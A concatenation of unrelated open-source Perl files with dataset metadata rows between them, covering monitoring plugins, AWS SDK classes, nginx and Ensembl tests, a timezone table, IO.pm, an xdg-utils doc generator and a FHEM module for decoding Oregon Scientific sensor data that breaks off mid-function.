instances => [keys %{$self->{snapvault}}], instance_regexp => '^(.*)$');
$snmp_result = $options{snmp}->get_leef(nothing_quit => 1);
foreach (keys %{$self->{snapvault}}) {
my $result = $options{snmp}->map_instance(mapping => $mapping, results => $snmp_result, instance => $_);
$result->{svTotalTransMBs} *= 1024 * 1024;
$result->{svLag} = int($result->{svLag} / 100);
$self->{snapvault}->{$_} = { %{$self->{snapvault}->{$_}}, %$result };
}
$self->{cache_name} = "netapp_" . $self->{mode} . '_' . $options{snmp}->get_hostname() . '_' . $options{snmp}->get_port() . '_' .
(defined($self->{option_results}->{filter_counters}) ? md5_hex($self->{option_results}->{filter_counters}) : md5_hex('all')) . '_' .
(defined($self->{option_results}->{filter_name}) ? md5_hex($self->{option_results}->{filter_name}) : md5_hex('all'));
}
1;
__END__
=head1 MODE
Check snapvault usage.
=over 8
=item B<--filter-name>
Filter snapvault name (can be a regexp).
=item B<--unknown-status>
Set warning threshold for status (Default: '').
Can used special variables like: %{state}, %{status}, %{display}
=item B<--warning-status>
Set warning threshold for status (Default: '').
Can used special variables like: %{state}, %{status}, %{display}
=item B<--critical-status>
Set critical threshold for status (Default: '').
Can used special variables like: %{state}, %{status}, %{display}
=item B<--warning-*> B<--critical-*>
Threshold warning.
Can be: 'lag' (s), 'transfer-traffic' (B/s), 'transfer-succeed',
'transfer-failed'.
=back
=cut
| 36.922131 | 180 | 0.551671 |
edb2f56e922d65f897503e42e90679fa3e053799 | 368 | pm | Perl | lib/Zonemaster/LDNS/RR/CAA.pm | pnax/zonemaster-ldns | 001a9835bbc92367f8bab4228010c62872f7ffba | [
"CC-BY-4.0"
] | null | null | null | lib/Zonemaster/LDNS/RR/CAA.pm | pnax/zonemaster-ldns | 001a9835bbc92367f8bab4228010c62872f7ffba | [
"CC-BY-4.0"
] | 1 | 2018-02-09T15:56:37.000Z | 2018-02-13T13:09:20.000Z | lib/Zonemaster/LDNS/RR/CAA.pm | mattias-p/zonemaster-ldns | b5d59e05d8926520c2fe8c571910491ca8f95dd2 | [
"CC-BY-4.0"
] | null | null | null | package Zonemaster::LDNS::RR::CAA;
use strict;
use warnings;
use parent 'Zonemaster::LDNS::RR';
1;
=head1 NAME
Zonemaster::LDNS::RR::CAA - Type CAA record
=head1 DESCRIPTION
A subclass of L<Zonemaster::LDNS::RR>, so it has all the methods of that class available in addition to the ones documented here.
=head1 METHODS
No RDATA methods implemented yet.
=cut
| 16 | 129 | 0.741848 |
73e51ce2a28b1554372d7d84592de80fc3a6282a | 2,059 | pm | Perl | auto-lib/Paws/ServerlessRepo/DeleteApplication.pm | 0leksii/aws-sdk-perl | b2132fe3c79a06fd15b6137e8a0eb628de722e0f | [
"Apache-2.0"
] | 164 | 2015-01-08T14:58:53.000Z | 2022-02-20T19:16:24.000Z | auto-lib/Paws/ServerlessRepo/DeleteApplication.pm | 0leksii/aws-sdk-perl | b2132fe3c79a06fd15b6137e8a0eb628de722e0f | [
"Apache-2.0"
] | 348 | 2015-01-07T22:08:38.000Z | 2022-01-27T14:34:44.000Z | auto-lib/Paws/ServerlessRepo/DeleteApplication.pm | 0leksii/aws-sdk-perl | b2132fe3c79a06fd15b6137e8a0eb628de722e0f | [
"Apache-2.0"
] | 87 | 2015-04-22T06:29:47.000Z | 2021-09-29T14:45:55.000Z |
package Paws::ServerlessRepo::DeleteApplication;
use Moose;
has ApplicationId => (is => 'ro', isa => 'Str', traits => ['ParamInURI'], uri_name => 'applicationId', required => 1);
use MooseX::ClassAttribute;
class_has _api_call => (isa => 'Str', is => 'ro', default => 'DeleteApplication');
class_has _api_uri => (isa => 'Str', is => 'ro', default => '/applications/{applicationId}');
class_has _api_method => (isa => 'Str', is => 'ro', default => 'DELETE');
class_has _returns => (isa => 'Str', is => 'ro', default => 'Paws::API::Response');
1;
### main pod documentation begin ###
=head1 NAME
Paws::ServerlessRepo::DeleteApplication - Arguments for method DeleteApplication on L<Paws::ServerlessRepo>
=head1 DESCRIPTION
This class represents the parameters used for calling the method DeleteApplication on the
L<AWSServerlessApplicationRepository|Paws::ServerlessRepo> service. Use the attributes of this class
as arguments to method DeleteApplication.
You shouldn't make instances of this class. Each attribute should be used as a named argument in the call to DeleteApplication.
=head1 SYNOPSIS
my $serverlessrepo = Paws->service('ServerlessRepo');
$serverlessrepo->DeleteApplication(
ApplicationId => 'My__string',
);
Values for attributes that are native types (Int, String, Float, etc) can passed as-is (scalar values). Values for complex Types (objects) can be passed as a HashRef. The keys and values of the hashref will be used to instance the underlying object.
For the AWS API documentation, see L<https://docs.aws.amazon.com/goto/WebAPI/serverlessrepo/DeleteApplication>
=head1 ATTRIBUTES
=head2 B<REQUIRED> ApplicationId => Str
The Amazon Resource Name (ARN) of the application.
=head1 SEE ALSO
This class forms part of L<Paws>, documenting arguments for method DeleteApplication in L<Paws::ServerlessRepo>
=head1 BUGS and CONTRIBUTIONS
The source code is located here: L<https://github.com/pplu/aws-sdk-perl>
Please report bugs to: L<https://github.com/pplu/aws-sdk-perl/issues>
=cut
| 33.754098 | 249 | 0.734823 |
edb40965322d84bc3d4a82c59cfa389dbf16eb0a | 1,688 | t | Perl | stream_upstream_zone.t | cabecada/nginx-tests | 9ed3127deb5586ae0478598989cebfddb226b898 | [
"BSD-2-Clause"
] | null | null | null | stream_upstream_zone.t | cabecada/nginx-tests | 9ed3127deb5586ae0478598989cebfddb226b898 | [
"BSD-2-Clause"
] | null | null | null | stream_upstream_zone.t | cabecada/nginx-tests | 9ed3127deb5586ae0478598989cebfddb226b898 | [
"BSD-2-Clause"
] | null | null | null | #!/usr/bin/perl
# (C) Sergey Kandaurov
# (C) Nginx, Inc.
# Stream tests for upstream zone.
###############################################################################
use warnings;
use strict;
use Test::More;
BEGIN { use FindBin; chdir($FindBin::Bin); }
use lib 'lib';
use Test::Nginx;
use Test::Nginx::Stream qw/ stream /;
###############################################################################
select STDERR; $| = 1;
select STDOUT; $| = 1;
my $t = Test::Nginx->new()->has(qw/stream stream_return stream_upstream_zone/)
->plan(2)->write_file_expand('nginx.conf', <<'EOF');
%%TEST_GLOBALS%%
daemon off;
events {
}
stream {
log_format test $upstream_addr;
upstream u {
zone u 1m;
server 127.0.0.1:8081;
}
upstream u2 {
zone u;
server 127.0.0.1:8081 down;
server 127.0.0.1:8081 backup down;
}
server {
listen 127.0.0.1:8081;
return OK;
}
server {
listen 127.0.0.1:8091;
proxy_pass u;
access_log %%TESTDIR%%/access1.log test;
}
server {
listen 127.0.0.1:8092;
proxy_pass u2;
access_log %%TESTDIR%%/access2.log test;
}
}
EOF
$t->write_file('index.html', '');
$t->run();
###############################################################################
my $p = port(8081);
stream('127.0.0.1:' . port(8091))->read();
stream("127.0.0.1:" . port(8092))->read();
$t->stop();
is($t->read_file('access1.log'), "127.0.0.1:$p\n", 'upstream name');
is($t->read_file('access2.log'), "u2\n", 'no live upstreams');
###############################################################################
| 19.181818 | 79 | 0.457938 |
ed4a5e305e684f8aab454996082673133126d0f6 | 1,972 | pm | Perl | perl/vendor/lib/DateTime/TimeZone/Africa/Nairobi.pm | Light2027/OnlineCampusSandbox | 8dcaaf62af1342470f9e7be6d42bd0f16eb910b8 | [
"Apache-2.0"
] | null | null | null | perl/vendor/lib/DateTime/TimeZone/Africa/Nairobi.pm | Light2027/OnlineCampusSandbox | 8dcaaf62af1342470f9e7be6d42bd0f16eb910b8 | [
"Apache-2.0"
] | 3 | 2021-01-27T10:09:28.000Z | 2021-05-11T21:20:12.000Z | perl/vendor/lib/DateTime/TimeZone/Africa/Nairobi.pm | Light2027/OnlineCampusSandbox | 8dcaaf62af1342470f9e7be6d42bd0f16eb910b8 | [
"Apache-2.0"
] | null | null | null | # This file is auto-generated by the Perl DateTime Suite time zone
# code generator (0.08) This code generator comes with the
# DateTime::TimeZone module distribution in the tools/ directory
#
# Generated from /tmp/PG8ljYXUN8/africa. Olson data version 2019c
#
# Do not edit this file directly.
#
package DateTime::TimeZone::Africa::Nairobi;
use strict;
use warnings;
use namespace::autoclean;
our $VERSION = '2.38';
use Class::Singleton 1.03;
use DateTime::TimeZone;
use DateTime::TimeZone::OlsonDB;
@DateTime::TimeZone::Africa::Nairobi::ISA = ( 'Class::Singleton', 'DateTime::TimeZone' );
my $spans =
[
[
DateTime::TimeZone::NEG_INFINITY, # utc_start
60825936764, # utc_end 1928-06-30 21:32:44 (Sat)
DateTime::TimeZone::NEG_INFINITY, # local_start
60825945600, # local_end 1928-07-01 00:00:00 (Sun)
8836,
0,
'LMT',
],
[
60825936764, # utc_start 1928-06-30 21:32:44 (Sat)
60873368400, # utc_end 1929-12-31 21:00:00 (Tue)
60825947564, # local_start 1928-07-01 00:32:44 (Sun)
60873379200, # local_end 1930-01-01 00:00:00 (Wed)
10800,
0,
'EAT',
],
[
60873368400, # utc_start 1929-12-31 21:00:00 (Tue)
61188903000, # utc_end 1939-12-31 21:30:00 (Sun)
60873377400, # local_start 1929-12-31 23:30:00 (Tue)
61188912000, # local_end 1940-01-01 00:00:00 (Mon)
9000,
0,
'+0230',
],
[
61188903000, # utc_start 1939-12-31 21:30:00 (Sun)
61820054100, # utc_end 1959-12-31 21:15:00 (Thu)
61188912900, # local_start 1940-01-01 00:15:00 (Mon)
61820064000, # local_end 1960-01-01 00:00:00 (Fri)
9900,
0,
'+0245',
],
[
61820054100, # utc_start 1959-12-31 21:15:00 (Thu)
DateTime::TimeZone::INFINITY, # utc_end
61820064900, # local_start 1960-01-01 00:15:00 (Fri)
DateTime::TimeZone::INFINITY, # local_end
10800,
0,
'EAT',
],
];
sub olson_version {'2019c'}
sub has_dst_changes {0}
sub _max_year {2029}
sub _new_instance {
return shift->_init( @_, spans => $spans );
}
1;
| 22.666667 | 89 | 0.673935 |
eda6e4ff76b9cc9a39667ef038edc31e3f1c2fdf | 3,241 | pm | Perl | database/sybase/mode/connectedusers.pm | alenorcy/centreon-plugins | d7603030c24766935ed07e6ebe1082e16d6fdb4a | [
"Apache-2.0"
] | null | null | null | database/sybase/mode/connectedusers.pm | alenorcy/centreon-plugins | d7603030c24766935ed07e6ebe1082e16d6fdb4a | [
"Apache-2.0"
] | 2 | 2016-07-28T10:18:20.000Z | 2017-04-11T14:16:48.000Z | database/sybase/mode/connectedusers.pm | alenorcy/centreon-plugins | d7603030c24766935ed07e6ebe1082e16d6fdb4a | [
"Apache-2.0"
] | 1 | 2018-03-20T11:05:05.000Z | 2018-03-20T11:05:05.000Z | #
# Copyright 2019 Centreon (http://www.centreon.com/)
#
# Centreon is a full-fledged industry-strength solution that meets
# the needs in IT infrastructure and application monitoring for
# service performance.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
package database::sybase::mode::connectedusers;
use base qw(centreon::plugins::mode);
use strict;
use warnings;
sub new {
my ($class, %options) = @_;
my $self = $class->SUPER::new(package => __PACKAGE__, %options);
bless $self, $class;
$options{options}->add_options(arguments =>
{
"warning:s" => { name => 'warning', },
"critical:s" => { name => 'critical', },
});
return $self;
}
sub check_options {
my ($self, %options) = @_;
$self->SUPER::init(%options);
if (($self->{perfdata}->threshold_validate(label => 'warning', value => $self->{option_results}->{warning})) == 0) {
$self->{output}->add_option_msg(short_msg => "Wrong warning threshold '" . $self->{option_results}->{warning} . "'.");
$self->{output}->option_exit();
}
if (($self->{perfdata}->threshold_validate(label => 'critical', value => $self->{option_results}->{critical})) == 0) {
$self->{output}->add_option_msg(short_msg => "Wrong critical threshold '" . $self->{option_results}->{critical} . "'.");
$self->{output}->option_exit();
}
}
sub run {
my ($self, %options) = @_;
# $options{sql} = sqlmode object
$self->{sql} = $options{sql};
$self->{sql}->connect();
$self->{sql}->query(query => q{SELECT count(*) FROM master..sysprocesses WHERE spid >= 51});
my $users = $self->{sql}->fetchrow_array();
my $exit_code = $self->{perfdata}->threshold_check(value => $users, threshold => [ { label => 'critical', exit_litteral => 'critical' }, { label => 'warning', exit_litteral => 'warning' } ]);
$self->{output}->output_add(severity => $exit_code,
short_msg => sprintf("%i Connected user(s).", $users));
$self->{output}->perfdata_add(label => 'connected_users',
value => $users,
warning => $self->{perfdata}->get_perfdata_for_output(label => 'warning'),
critical => $self->{perfdata}->get_perfdata_for_output(label => 'critical'),
min => 0);
$self->{output}->display();
$self->{output}->exit();
}
1;
__END__
=head1 MODE
Check MSSQL connected users.
=over 8
=item B<--warning>
Threshold warning.
=item B<--critical>
Threshold critical.
=back
=cut
| 32.737374 | 195 | 0.587164 |
ed98af65fe41a146aca2be8e591bd1b509c13376 | 1,449 | pm | Perl | Git/usr/lib/perl5/core_perl/IO.pm | DalalBassam/myrecipeswebsite | 1ac6e97b6bac19b6d8a06d8ebf36e1f1b79a18f4 | [
"MIT"
] | 12 | 2016-05-06T23:44:19.000Z | 2018-04-27T21:46:36.000Z | Git/usr/lib/perl5/core_perl/IO.pm | DalalBassam/myrecipeswebsite | 1ac6e97b6bac19b6d8a06d8ebf36e1f1b79a18f4 | [
"MIT"
] | 5 | 2020-03-23T07:56:06.000Z | 2020-03-24T02:05:11.000Z | Git/usr/lib/perl5/core_perl/IO.pm | DalalBassam/myrecipeswebsite | 1ac6e97b6bac19b6d8a06d8ebf36e1f1b79a18f4 | [
"MIT"
] | 9 | 2016-10-21T08:18:57.000Z | 2021-05-23T14:19:21.000Z | #
package IO;
use XSLoader ();
use Carp;
use strict;
use warnings;
our $VERSION = "1.38";
XSLoader::load 'IO', $VERSION;
sub import {
shift;
warnings::warnif('deprecated', qq{Parameterless "use IO" deprecated})
if @_ == 0 ;
my @l = @_ ? @_ : qw(Handle Seekable File Pipe Socket Dir);
local @INC = @INC;
pop @INC if $INC[-1] eq '.';
eval join("", map { "require IO::" . (/(\w+)/)[0] . ";\n" } @l)
or croak $@;
}
1;
__END__
=head1 NAME
IO - load various IO modules
=head1 SYNOPSIS
use IO qw(Handle File); # loads IO modules, here IO::Handle, IO::File
use IO; # DEPRECATED
=head1 DESCRIPTION
C<IO> provides a simple mechanism to load several of the IO modules
in one go. The IO modules belonging to the core are:
IO::Handle
IO::Seekable
IO::File
IO::Pipe
IO::Socket
IO::Dir
IO::Select
IO::Poll
Some other IO modules don't belong to the perl core but can be loaded
as well if they have been installed from CPAN. You can discover which
ones exist by searching for "^IO::" on http://search.cpan.org.
For more information on any of these modules, please see its respective
documentation.
=head1 DEPRECATED
use IO; # loads all the modules listed below
The loaded modules are IO::Handle, IO::Seekable, IO::File, IO::Pipe,
IO::Socket, IO::Dir. You should instead explicitly import the IO
modules you want.
=cut
| 20.408451 | 73 | 0.636301 |
ed2707d6d0fb18521325ce819749fa83fec349b9 | 102 | t | Perl | test/blackbox-tests/test-cases/shadow-bindings.t/run.t | jeremiedimino/dune | ba112ce967bb9307db7d92efcb13c603724947e5 | [
"MIT"
] | 1 | 2022-03-21T15:43:42.000Z | 2022-03-21T15:43:42.000Z | test/blackbox-tests/test-cases/shadow-bindings.t/run.t | jeremiedimino/dune | ba112ce967bb9307db7d92efcb13c603724947e5 | [
"MIT"
] | 2 | 2018-01-12T08:41:59.000Z | 2020-12-30T21:57:31.000Z | test/blackbox-tests/test-cases/shadow-bindings.t/run.t | jeremiedimino/dune | ba112ce967bb9307db7d92efcb13c603724947e5 | [
"MIT"
] | 1 | 2017-12-07T21:21:12.000Z | 2017-12-07T21:21:12.000Z | Bindings introduced by user dependencies should shadow existing bindings
$ dune runtest
xb
foo
| 17 | 72 | 0.784314 |
eda09f4757b9980aac93b9c1be8f1dd2589b679c | 3,460 | pm | Perl | src/main/resources/project/lib/Amazon/EC2/Model/CreateVolumeResponse.pm | horodchukanton/EC-EC2 | 2e82f82e24cd19fb408dee7d92f5bb072328c3df | [
"Apache-2.0"
] | null | null | null | src/main/resources/project/lib/Amazon/EC2/Model/CreateVolumeResponse.pm | horodchukanton/EC-EC2 | 2e82f82e24cd19fb408dee7d92f5bb072328c3df | [
"Apache-2.0"
] | 12 | 2015-11-09T18:52:09.000Z | 2019-07-17T12:00:09.000Z | src/main/resources/project/lib/Amazon/EC2/Model/CreateVolumeResponse.pm | horodchukanton/EC-EC2 | 2e82f82e24cd19fb408dee7d92f5bb072328c3df | [
"Apache-2.0"
] | 4 | 2015-11-09T14:47:55.000Z | 2018-12-21T21:51:42.000Z | ###########################################$
# Copyright 2008-2010 Amazon.com, Inc. or its affiliates. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License"). You may not
# use this file except in compliance with the License.
# A copy of the License is located at
#
# http://aws.amazon.com/apache2.0
#
# or in the "license" file accompanying this file. This file is distributed on
# an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
# or implied. See the License for the specific language governing permissions
# and limitations under the License.
###########################################$
# __ _ _ ___
# ( )( \/\/ )/ __)
# /__\ \ / \__ \
# (_)(_) \/\/ (___/
#
# Amazon EC2 Perl Library
# API Version: 2010-06-15
# Generated: Wed Jul 21 13:37:54 PDT 2010
#
package Amazon::EC2::Model::CreateVolumeResponse;
use base qw (Amazon::EC2::Model);
#
# Amazon::EC2::Model::CreateVolumeResponse
#
# Properties:
#
#
# CreateVolumeResult: Amazon::EC2::Model::CreateVolumeResult
# ResponseMetadata: Amazon::EC2::Model::ResponseMetadata
#
#
#
sub new {
my ($class, $data) = @_;
my $self = {};
$self->{_fields} = {
CreateVolumeResult => {FieldValue => undef, FieldType => "Amazon::EC2::Model::CreateVolumeResult"},
ResponseMetadata => {FieldValue => undef, FieldType => "Amazon::EC2::Model::ResponseMetadata"},
};
bless ($self, $class);
if (defined $data) {
$self->_fromHashRef($data);
}
return $self;
}
#
# Construct Amazon::EC2::Model::CreateVolumeResponse from XML string
#
sub fromXML {
my ($self, $xml) = @_;
eval "use XML::Simple";
my $tree = XML::Simple::XMLin ($xml);
# TODO: check valid XML (is this a response XML?)
return new Amazon::EC2::Model::CreateVolumeResponse($tree);
}
sub getCreateVolumeResult {
return shift->{_fields}->{CreateVolumeResult}->{FieldValue};
}
sub setCreateVolumeResult {
my ($self, $value) = @_;
$self->{_fields}->{CreateVolumeResult}->{FieldValue} = $value;
}
sub withCreateVolumeResult {
my ($self, $value) = @_;
$self->setCreateVolumeResult($value);
return $self;
}
sub isSetCreateVolumeResult {
return defined (shift->{_fields}->{CreateVolumeResult}->{FieldValue});
}
sub getResponseMetadata {
return shift->{_fields}->{ResponseMetadata}->{FieldValue};
}
sub setResponseMetadata {
my ($self, $value) = @_;
$self->{_fields}->{ResponseMetadata}->{FieldValue} = $value;
}
sub withResponseMetadata {
my ($self, $value) = @_;
$self->setResponseMetadata($value);
return $self;
}
sub isSetResponseMetadata {
return defined (shift->{_fields}->{ResponseMetadata}->{FieldValue});
}
#
# XML Representation for this object
#
# Returns string XML for this object
#
sub toXML {
my $self = shift;
my $xml = "";
$xml .= "<CreateVolumeResponse xmlns=\"http://ec2.amazonaws.com/doc/2010-06-15/\">";
$xml .= $self->_toXMLFragment();
$xml .= "</CreateVolumeResponse>";
return $xml;
}
1;
| 25.072464 | 111 | 0.561561 |
ed29d94bf52d75a5f2b9e95d4cdb69f741ebf810 | 4,679 | pl | Perl | tests/doc_gen.pl | chromium-googlesource-mirror/xdg-utils | 7b903508c0dea743114236c35866a9131121ba61 | [
"MIT"
] | 2,151 | 2020-04-18T07:31:17.000Z | 2022-03-31T08:39:18.000Z | tests/doc_gen.pl | chromium-googlesource-mirror/xdg-utils | 7b903508c0dea743114236c35866a9131121ba61 | [
"MIT"
] | 395 | 2020-04-18T08:22:18.000Z | 2021-12-08T13:04:49.000Z | tests/doc_gen.pl | chromium-googlesource-mirror/xdg-utils | 7b903508c0dea743114236c35866a9131121ba61 | [
"MIT"
] | 338 | 2020-04-18T08:03:10.000Z | 2022-03-29T12:33:22.000Z | #!perl
use Data::Dumper;
my @test_files = split('\s+',`ls generic/t.* xdg-*/t.*`);
my $cvs_pre = "http://webcvs.freedesktop.org/portland/portland/xdg-utils/tests/";
my $cvs_post = '?view=markup';
my $assert_doc = "assertions.html";
my $now = scalar localtime;
my $style = "<style type=\"text/css\" media=\"all\">@import url(\"layout.css\");</style></head>\n";
my $root_header = qq{| <a href="index.html">Tests</a> | <a href="$assert_doc">Assertions</a> | <a href="http://portland.freedesktop.org/wiki/WritingXdgTests">Overview</a> |<hr/>\n};
my $group_header = qq{| <a href="../index.html">Tests</a> | <a href="../$assert_doc">Assertions</a> | <a href="http://portland.freedesktop.org/wiki/WritingXdgTests">Overview</a> |<hr/>\n};
my $footer = "<hr><font size=\"-1\">xdg-utils test documentation generated $now</font>\n";
my %fcns;
my %group;
my %shortdesc;
## Read assertion file
open IN, 'include/testassertions.sh' or die "Failed to open assertion file: $!\n";
my $state = 'NULL';
my %assertions;
while ( <IN> ) {
if ( m/(\w+)\s*\(\)/ ) {
$state = $1;
$assertions{$state} = ();
}
elsif ( $state ne 'NULL' and m/^#(.*)/ ) {
my $txt = $1;
chomp $txt;
push @{ $assertions{$state} }, $txt;
}
else {
$state = 'NULL';
}
}
close IN;
if ( ! -d 'doc' ) { mkdir 'doc'; }
open OUT, ">doc/$assert_doc" or die "Failed to open $assert_doc: $!\n";
print OUT "<html><head><title>xdg-utils test assertions</title>$style</head><body>\n$root_header";
my @s_assert = sort keys %assertions ;
print OUT qq{<h2>Defined Assertions in <a href="$cvs_pre}.qq{include/testassertions.sh$cvs_post">include/testassertions.sh</a></h2>\n};
for $a ( @s_assert ) {
print OUT qq{<a href="#$a">$a</a><br>\n};
}
for $a ( @s_assert ) {
print OUT qq{<hr><h2><a name="$a">$a</a></h2>\n};
print OUT "<pre>", join("\n",@{ $assertions{$a} } ), "</pre>\n";
}
print OUT "$footer</body></html>";
## Read test files
for $f ( @test_files ) {
open IN, $f or die "Failed to open $f: $!\n";
$f =~ m{(.+)/t\.(.+)};
my $dir = $1;
my $test = $2;
`mkdir -p doc/$dir`;
my $o = "doc/$dir/$test.html";
push @{ $group{$dir} }, $test;
open HTM, ">$o" or die "Failed to open '$o': $!\n";
print HTM "<html><head><title>xdg-utils test: $f</title>\n";
print HTM $style;
print HTM "<body>$group_header<h1>Test: <a href=\"$cvs_pre$f$cvs_post\">$f</a></h1><hr/>\n";
my $fcn = '';
my $state = 'BEGIN';
while ( <IN> ) {
#find the test function
if ( m/(\w+)\s*\(\)/ ) {
$fcn = $1;
if (defined $fcns{$fcn} ){
print "WARNING in $f: $fcn already exists in $fcns{$fcn}!\n"
}
$fcns{$fcn} = $f;
$state = 'FUNCTION';
}
#find test_start
elsif ( m/test_start (.*)/ ) {
print HTM "<h2>Purpose of $fcn</h2>";
my $txt = $1;
$txt =~ s/\$FUNCNAME:*\s*//;
$txt =~ s/\"//g;
$shortdesc{ $test } = $txt;
print HTM "<p>$txt</p>\n";
$state = 'START';
}
#find test_purpose
elsif ( m/test_purpose (.*)/ ) {
print HTM "<h2>Description</h2>";
my $txt = $1;
$txt =~ s/\"//g;
print HTM "<p>$txt</p>\n";
}
#find initilization
elsif ( m/test_init/ ) {
print HTM "<h2>Depencencies</h2>\n";
$state = 'INIT';
next;
}
elsif ( m/test_procedure/ ) {
print HTM "<h2>Test Procedure</h2>\n";
$state = 'TEST';
next;
}
elsif ( m/test_note (.*)/ ) {
print HTM "<h2>Note</h2><p>$1</p>\n";
next;
}
elsif ( m/test_result/ ) {
$state = 'DONE';
}
if ( m/^#/ ) {
next;
}
if ( $state eq 'INIT' or $state eq 'TEST' ) {
$line = $_;
$line =~ s/^\s*(\w+)/<a href="\.\.\/$assert_doc#$1">$1<\/a>/;
if ( $assertions{$1} ) {
print HTM "<p>$line</p>\n";
#print "$f:\t'$1' found\n";
}
else {
#print "$f:\t'$1' not found\n";
print HTM "<p>$_</p>\n";
}
#print HTM "<p>$_</p>\n";
}
}
print HTM "$footer</body></html>\n";
close HTM;
close IN;
}
open INDEX, ">doc/index.html" or die "Could not open index: $!";
print INDEX "<html><head><title>xdg-utils test suite</title>\n";
print INDEX $style;
print INDEX "<body>$root_header<h1>xdg-utils test documentation</h1>";
my @s_groups = sort keys %group;
for $g ( @s_groups ) {
print INDEX qq{<a href="#$g">$g</a> \n};
}
print INDEX "<table border=0>\n";
for $k ( @s_groups ) {
print INDEX qq{<tr><td colspan=2><hr><h2><a name="$k">$k</a></h2></td></tr>\n};
for $i ( @{ $group{$k} } ) {
print INDEX "<tr><td><a href=\"$k/$i.html\">$i</a></td><td>$shortdesc{$i}</td></tr>\n";
}
}
print INDEX "</table>$footer</body></html>\n";
close INDEX;
#print Dumper keys %assertions;
| 28.357576 | 189 | 0.543492 |
edae6e15aca13c56ce1c728a5ee96e55d5b9035b | 1,830 | t | Perl | modules/t/regression_featureAdaptorCache.t | sgiorgetti/ensembl | ff90d0812cc0e64cc55c74a759575db351c5217b | [
"Apache-2.0"
] | 1 | 2021-09-27T11:01:06.000Z | 2021-09-27T11:01:06.000Z | modules/t/regression_featureAdaptorCache.t | sgiorgetti/ensembl | ff90d0812cc0e64cc55c74a759575db351c5217b | [
"Apache-2.0"
] | 1 | 2021-09-23T13:46:54.000Z | 2021-09-23T13:46:54.000Z | modules/t/regression_featureAdaptorCache.t | sgiorgetti/ensembl | ff90d0812cc0e64cc55c74a759575db351c5217b | [
"Apache-2.0"
] | null | null | null | # Copyright [1999-2015] Wellcome Trust Sanger Institute and the EMBL-European Bioinformatics Institute
# Copyright [2016-2022] EMBL-European Bioinformatics Institute
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
use strict;
use warnings;
use Test::More;
use Test::Warnings;
use Bio::EnsEMBL::Test::MultiTestDB;
my $multi = Bio::EnsEMBL::Test::MultiTestDB->new();
my $db = $multi->get_DBAdaptor( "core" );
my $sa = $db->get_SliceAdaptor();
my $ga = $db->get_GeneAdaptor();
ok(!$ga->db()->no_cache(), 'Checking cache is on');
my $cache_assert = sub {
my ($expected) = @_;
is(scalar(keys %{$ga->{_slice_feature_cache}}), $expected, sprintf('Asserting cache has %d element(s)', $expected));
};
my $run = sub {
my $start = 30_249_935;
my $end = 31_254_640;
my $offset = 0;
my @regions = (
[$start, $end + $offset++],
[$start, $end + $offset++],
[$start, $end + $offset++],
[$start, $end + $offset++],
[$start, $end + $offset++]
);
$ga->fetch_all_by_Slice($sa->fetch_by_region( "chromosome", "20", @{$regions[0]} ));
$cache_assert->(1);
foreach my $region (@regions) {
my $slice = $sa->fetch_by_region( "chromosome", "20", @{$region} );
my $features = $ga->fetch_all_by_Slice($slice);
}
$cache_assert->(4);
};
$run->();
$ga->clear_cache();
$run->();
done_testing();
| 30 | 118 | 0.663934 |
ed14106870dc2abbde1d3efe4102770369ae5d23 | 10,222 | pm | Perl | fhem/core/FHEM/14_CUL_REDIRECT.pm | opit7/fhem-docker | d44c9913155318eeae9500767f947a02bbcbac76 | [
"MIT"
] | 9 | 2018-02-06T11:57:50.000Z | 2021-12-10T13:59:03.000Z | fhem/core/FHEM/14_CUL_REDIRECT.pm | opit7/fhem-docker | d44c9913155318eeae9500767f947a02bbcbac76 | [
"MIT"
] | null | null | null | fhem/core/FHEM/14_CUL_REDIRECT.pm | opit7/fhem-docker | d44c9913155318eeae9500767f947a02bbcbac76 | [
"MIT"
] | 1 | 2020-03-20T18:04:49.000Z | 2020-03-20T18:04:49.000Z | ##############################################
# From dancer0705
#
# Receive additional protocols received by cul
#
# Copyright (C) 2015 Bjoern Hempel
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free Software
# Foundation; either version 2 of the License, or (at your option) any later
# version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
# or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the
# Free Software Foundation, Inc.,
# 51 Franklin St, Fifth Floor, Boston, MA 02110, USA
#
##############################################
package main;
use Data::Dumper;
use strict;
use warnings;
use SetExtensions;
use constant { TRUE => 1, FALSE => 0 };
sub
CUL_REDIRECT_Initialize($)
{
my ($hash) = @_;
$hash->{Match} = "^o........";
$hash->{ParseFn} = "CUL_REDIRECT_Parse";
}
#
# Decode Oregon 2
#
sub decodeOrego2 {
my $msg = shift;
my $name = shift;
my @a = split("", $msg);
Log3 $name, 5, "CUL_REDIRECT decode Oregon 2 ($msg)";
my $newMSG = "";
my $bitData;
my $hlen = length($msg);
my $blen = $hlen * 4;
$bitData= unpack("B$blen", pack("H$hlen", $msg));
Log3 $name, 5, "bitdata: $bitData";
if (index($bitData,"10011001") != -1)
{ # Valid OSV2 detected!
Log3 $name, 5, "OSV2 protocol detected ($msg)";
my $preamble_pos=index($bitData,"10011001");
my $message_end=index($bitData,"10011001",$preamble_pos+44);
$message_end = length($bitData) if ($message_end == -1);
my $message_length = $message_end - $preamble_pos;
my $idx=0;
my $osv2bits="";
my $osv2hex ="";
for ($idx=$preamble_pos;$idx<length($bitData);$idx=$idx+16)
{
if (length($bitData)-$idx < 16 )
{
last;
}
my $osv2byte = "";
$osv2byte=NULL;
$osv2byte=substr($bitData,$idx,16);
my $rvosv2byte="";
for (my $p=1;$p<length($osv2byte);$p=$p+2)
{
